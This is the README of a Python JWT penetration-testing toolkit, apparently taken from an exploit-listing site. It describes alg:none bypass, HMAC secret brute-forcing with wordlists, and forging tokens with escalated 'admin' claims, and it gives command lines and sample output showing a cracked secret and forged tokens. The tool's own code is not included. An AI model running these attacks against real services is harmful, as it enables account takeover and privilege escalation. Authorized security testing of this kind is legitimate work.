Share
## https://sploitus.com/exploit?id=33B94765-A904-5A69-B085-1C09604D9A05
# JWT Exploit Toolkit

![Python](https://img.shields.io/badge/Python-3.10+-blue?logo=python&logoColor=white)
![License](https://img.shields.io/badge/License-MIT-green)
![Purpose](https://img.shields.io/badge/Purpose-Bug%20Bounty-red)

A Python-based JWT (JSON Web Token) vulnerability testing toolkit for penetration testing and bug bounty engagements. Automates detection and exploitation of common JWT implementation flaws.

## Features

- **Token Decoding** โ€” Decode and inspect JWT headers, payloads, and signatures without verification
- **Algorithm None Attack** โ€” Test for `alg:none` signature bypass vulnerabilities
- **Secret Brute-Forcing** โ€” Dictionary attack against HMAC-signed tokens (HS256/HS384/HS512)
- **Claim Tampering** โ€” Generate forged tokens with modified claims (role escalation, user ID swap)
- **Expiration Bypass** โ€” Test for tokens with missing or unenforced expiration checks
- **Report Generation** โ€” JSON/CSV output of all findings

## Installation

```bash
git clone https://github.com/icy89/jwt-exploit-toolkit.git
cd jwt-exploit-toolkit
pip install -r requirements.txt
```

## Usage

```bash
# Decode a token (no verification)
python3 jwt_exploit.py decode -t "eyJhbGci..."

# Test alg:none bypass
python3 jwt_exploit.py none -t "eyJhbGci..."

# Brute-force the signing secret
python3 jwt_exploit.py crack -t "eyJhbGci..." -w wordlists/jwt_common.txt

# Crack with rockyou
python3 jwt_exploit.py crack -t "eyJhbGci..." -w /usr/share/wordlists/rockyou.txt

# Tamper claims (escalate to admin)
python3 jwt_exploit.py tamper -t "eyJhbGci..." -c '{"role": "admin"}' -s "discovered_secret"

# Full scan โ€” run all checks
python3 jwt_exploit.py scan -t "eyJhbGci..." -w wordlists/jwt_common.txt

# Export results
python3 jwt_exploit.py scan -t "eyJhbGci..." -w wordlists/jwt_common.txt --output results.json
```

## Example Output

```
โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•—
โ•‘          JWT EXPLOIT TOOLKIT             โ•‘
โ•‘           by @icy89 (Victor B.)          โ•‘
โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

[*] Decoding token (no verification)...
  Header:  {"alg": "HS256", "typ": "JWT"}
  Payload: {"user_id": 42, "role": "user", "exp": 1735689600}

[*] Testing alg:none bypass...
  [+] Forged token generated (test against target)

[*] Brute-forcing signing secret...
  [+] SECRET FOUND: password123
  [+] Tested 847 candidates in 0.3s

[*] Generating tampered tokens...
  [+] Admin escalation token: eyJhbGciOiJIUzI1...
  [+] User ID swap token:     eyJhbGciOiJIUzI1...
```

## Project Structure

```
jwt-exploit-toolkit/
โ”œโ”€โ”€ jwt_exploit.py        # Main CLI tool
โ”œโ”€โ”€ lib/
โ”‚   โ”œโ”€โ”€ decoder.py        # Token decoding and parsing
โ”‚   โ”œโ”€โ”€ cracker.py        # Secret brute-forcing
โ”‚   โ”œโ”€โ”€ attacks.py        # Attack implementations
โ”‚   โ””โ”€โ”€ reporter.py       # JSON/CSV report generation
โ”œโ”€โ”€ wordlists/
โ”‚   โ””โ”€โ”€ jwt_common.txt    # Common JWT secrets wordlist
โ”œโ”€โ”€ requirements.txt
โ”œโ”€โ”€ LICENSE
โ””โ”€โ”€ README.md
```

## Wordlist

The included `wordlists/jwt_common.txt` contains 200+ commonly used JWT signing secrets gathered from public disclosures, default configurations, and common developer patterns. For comprehensive testing, combine with `rockyou.txt` or SecLists.

## Disclaimer

This tool is intended for **authorized security testing and bug bounty research only**. Only test against systems you have explicit permission to assess. The author is not responsible for misuse.

## License

MIT License โ€” see [LICENSE](LICENSE) for details.